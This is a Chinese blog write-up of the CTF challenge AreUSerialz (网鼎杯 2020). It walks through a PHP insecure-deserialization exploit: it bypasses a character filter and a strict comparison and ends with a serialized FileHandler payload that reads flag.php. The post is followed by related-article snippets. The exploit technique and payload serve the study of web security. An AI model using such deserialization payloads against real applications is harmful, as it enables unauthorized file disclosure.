[网鼎杯 2020 青龙组]AreUSerialz

最新推荐文章于 2024-09-22 12:24:05 发布
最新推荐文章于 2024-09-22 12:24:05 发布
阅读量355 收藏
点赞数
文章标签: php javascript 开发语言 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_68074153/article/details/126253966
版权

1.代码审计

<?php

include("flag.php");

highlight_file(__FILE__);

class FileHandler {

    protected $op;
    protected $filename;
    protected $content;

    function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }

    public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

    private function write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }

    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }

    function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }

}

function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }

}

通过GET传入参数str,对参数进行序列化,并对传入参数使用is_valid()函数进行检测字符的ascll马在32到125之间。上面是定义的需要反序化的对象。当op==‘1’时会调用write方法并输出一些没什么用的字符后结束,当op==‘2’时会调用read方法读取$filename文件并赋值给$res输出。当op===‘2’时会执行__destruct函数并对op进行赋值为‘1’。

2.ascll码绕过

protected定义的变量在反序化后会在变量名后输出看不见的%00空白字符,ascll码默认为零,会被is_valid函数拦截。有两种绕过方式。

1.php7.1后对变量属性不敏感,换成public定义变量则不会产生%00字符,实现绕过。
2.利用大写S采用的16进制,来绕过is_valid中对空字节的检查。这个比较复杂这里主要用第一种。

3.弱比较强比较

检查op===‘2’时使用的是强比较,检查op==‘1’时使用的是弱比较,我们不能让op=‘2’执行__destruct函数并对op进行赋值为‘1’,也不能让op=‘1’执行write方法后结束,可以将op赋值为int型的2,从而绕过强比较的‘2’,和弱比较的‘1’。
最后的反序化变量为:

<?php 
class FileHandler {

    public $op=2;
    public $filename='flag.php';
    public $content; 
}
$b=new FileHandler();
$a=serialize($b);
echo $a;
?>

执行后得到payload:

O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:8:"flag.php";s:7:"content";N;}

传入后查看源码getflag。
在这里插入图片描述

SheepLeeeee
关注
[网鼎杯 2020 青龙]AreUSerialz1
kw741951的博客
08-01 825
分析此方法内的代码逻辑,当我们需要它正确输出flag时此魔术方法调用后会接着正确调用此对象中的process()方法和output()方法,所以write()方法也可以删除不用看, protected $content属性也可直接删了。根据代码逻辑分析,咱们可知 function __construct() {按照常规方法,首先,我们先将代码复制到本地进行序列化构造,$s的值ASCII码范围得在32<=$s<=125;根据构造函数is_valid($s) 可知,再根据构造函数read()可知,
2020网鼎杯青龙web AreUSerialz详解
永远是少年
12-20 873
今天继续给大家介绍CTF刷题,本文主要内容是2020网鼎杯青龙web AreUSerialz详解。 一、题目简介 二、PHP代码分析 三、解题实战
[网鼎杯 2020 青龙]AreUSerialz 1
bazzza的博客
12-21 2224
打开靶场,是一道php代码审计的题目,是个反序列化的题目 分块对代码进行分析,先分析输入部分 function is_valid($s) { for($i = 0; $i < strlen($s); $i++) if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))//限制字符串的范围 return false; return true; } if(isset($_GET{'st
[网鼎杯 2020 青龙]AreUSerialz 1参考解析
weixin_52003758的博客
01-28 3090
进入题目,便是php的代码 这是一个代码审计题目(序列化和反序列化) 【注】在代码中我已经给出了部分的注释 <?php // 文件包含 include("flag.php"); highlight_file(__FILE__); // 阐述FileHandler类 class FileHandler { protected $op; protected $filename; protected $content; // 构造函数,将op filename c
BUUCTF [网鼎杯 2020 青龙]AreUSerialz1
weixin_74410605的博客
08-20 391
得到O:11:"FileHandler":3:{s:2:"op";通过认真看代码及理解代码,根据op=2且filename=flag.php写出相应的反序列化代码构造payload即可得出flag。接着ctrl+u查看源码即可得到flag。
[网鼎杯 2020 青龙]AreUSerialz1详解两种常用方法及php伪协议扩展
m0_73615178的博客
01-21 656
此方法内的代码逻辑,当我们需要它正确输出flag时此魔术方法调用后会接着正确调用此对象中的。不在if判断的范围内,所以将%00改为\00其也是代表空字符且浏览器不会自动解析。没有new对象,所以以下__construct()魔术方法不会触发,直接删除。根据经验及实验,我们简单构造的序列化值都属于这个ASCII码范围内,但是我们将构造的第一个序列化值get上传发现并不是flag,返回了,当$op值强比较===不等于str(2),弱比较==等于2。按照常规方法,首先,我们先将代码复制到本地进行序列化构造,
buuctf-[网鼎杯 2020 青龙]AreUSerialz(小宇特详解)
小宇的web博客
01-28 2756
buuctf-[网鼎杯 2020 青龙]AreUSerialz(小宇特详解) <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op;//protected受保护的修饰符,被定义为受保护的类成员则可以被其自身以及其子类和父类访问 protected $filename; protected $content; function _
web | CTF】BUUCTF [网鼎杯 2020 青龙]AreUSerialz
weixin_46301214的博客
02-17 935
改动2:在op前面增加\00*\00,因为私有属性是会自带 * 号,需要用\00来截断(原理不清楚)先看进来入口的逻辑,判断是不是正常的ascii码字符,然后反序列化,可以忽略校验,都是正常的。看了一下只有读文件函数是有用的,那就要 $op=2 或者$op='2' 才行。奇怪的地方:$op是整数2,不能是字符串的2,很奇怪,明明字符串的2也可以啊。天命:这题也是有点奇怪的,明明用字符串2也应该是可以,但偏偏就不行,神奇了。天命:php的序列化题目简直是玄学,既不能本地复现,也不能求证靶场环境。
BUUCTF [网鼎杯 2020 青龙]AreUSerialz
lzu_lfl的博客
09-25 631
BUUCTF [网鼎杯 2020 青龙]AreUSerialz_WP
BUUCTF [网鼎杯 2020 青龙] AreUSerialz1
m0_74167420的博客
06-19 240
(2)对于FileHandler类,由于在反序列化中,先调用__destruct()析构方法,所以需要设计op的值绕过与 "2" 的强相等。(3)所以当op = 2时,一方面利用弱相等,可以调用read()方法和output()方法,另一方面也可以绕过强相等,避免执行在__destruct()时 op 赋值为 1。(1)get传参 "str",string转化为字符串,用 is_valid() 函数来进行过滤,要求传入的字符串的每一位字符的ASCII码都在32~125之间。1、阅读题目:php绕过类型。
2020网鼎杯青龙赛题.zip
05-10
比赛试题附件,其中包括misc,re,crypto,pwn,这些资源仅供学习参考,禁止用于盈利活动。希望大家可以合理利用,谢谢。
CTF赛题-[网鼎杯2020青龙]AreUSerialz
m0_57379855的博客
03-25 2132
CTF赛题-[网鼎杯2020青龙]AreUSerialz代码审计构造函数 代码审计 <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filenam
Hutool:Java开发者的瑞士军刀
技术无疆
09-16 1031
在Java的世界里,有这样一个工具库,它小巧而强大,功能丰富且易于使用,它就是Hutool。Hutool是一个Java工具包,旨在减少Java开发人员在开发过程中需要编写的重复代码。它就像瑞士军刀一样,为开发者提供了各种实用的工具,让开发工作更加高效。
PHP 运算符
lly202406的博客
09-20 409
PHP 是一种广泛使用的开源服务器端脚本语言,它在 web 开发中扮演着重要的角色。PHP 的强大功能之一是其丰富的运算符集,这些运算符用于执行各种操作,如算术、赋值、比较等。本文将详细介绍 PHP 中的运算符,包括它们的类型、用法和示例。
Contact Form 7最新5.9.8版错误修复方案
jianzhanyes的博客
09-18 255
Contact Form 7最新5.9.8版错误修复
内核是如何发送数据包
最新发布
weixin_45673259的博客
09-22 614
网络发包总流程图如下:从上图中可以看到用户数据被拷贝到内核态,然后经过协议栈处理后进入RingBuffer。随后网卡驱动真正的将数据发送了出去。当发送完成的时候,是通过硬中断来通知CPU,然后清理RingBuffer。下面从源码的角度给出一个流程图。
Shell篇之编写php启动脚本
小橙子的笔记屋
09-18 386
shell编写php启动脚本
YOLOv9改进,YOLOv9主干网络替换为RepViT (CVPR 2024,清华提出,独家首发),助力涨点
weixin_44779079的博客
09-17 1049
YOLOv9主干网络替换为RepViT,助力涨点,通过结合轻量级ViTs的架构设计,重新审视了轻量级CNNs的高效设计,最终得到了RepViT,这是一种为资源受限的移动设备设计的全新轻量级CNN家族。RepViT在多个视觉任务中超越了现有的轻量级ViTs和CNNs,表现出了优异的性能和延迟,突显了纯轻量级CNNs在移动设备上应用的广阔前景。
CTFShow-反序列化
qq_66013948的博客
09-17 1052
private变量会被序列化为:\x00类名\x00变量名protected变量会被序列化为: \x00*\x00变量名public变量会被序列化为:变量名__sleep() //在对象被序列化之前运行 *__wakeup() //将在反序列化之后立即调用(当反序列化时变量个数与实际不符是会绕过) *如果类中同时定义了 __unserialize() 和 __wakeup() 两个魔术方法, 则只有 __unserialize() 方法会生效,
允许外网访问青龙面板
10-10
要允许外网访问青龙面板,您需要进行以下操作: 1. 配置防火墙规则:确保服务器的防火墙允许外部访问面板的端口。默认情况下,青龙面板使用的是5700端口,您可以根据自己的需要进行配置。 2. 配置面板监听地址:...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值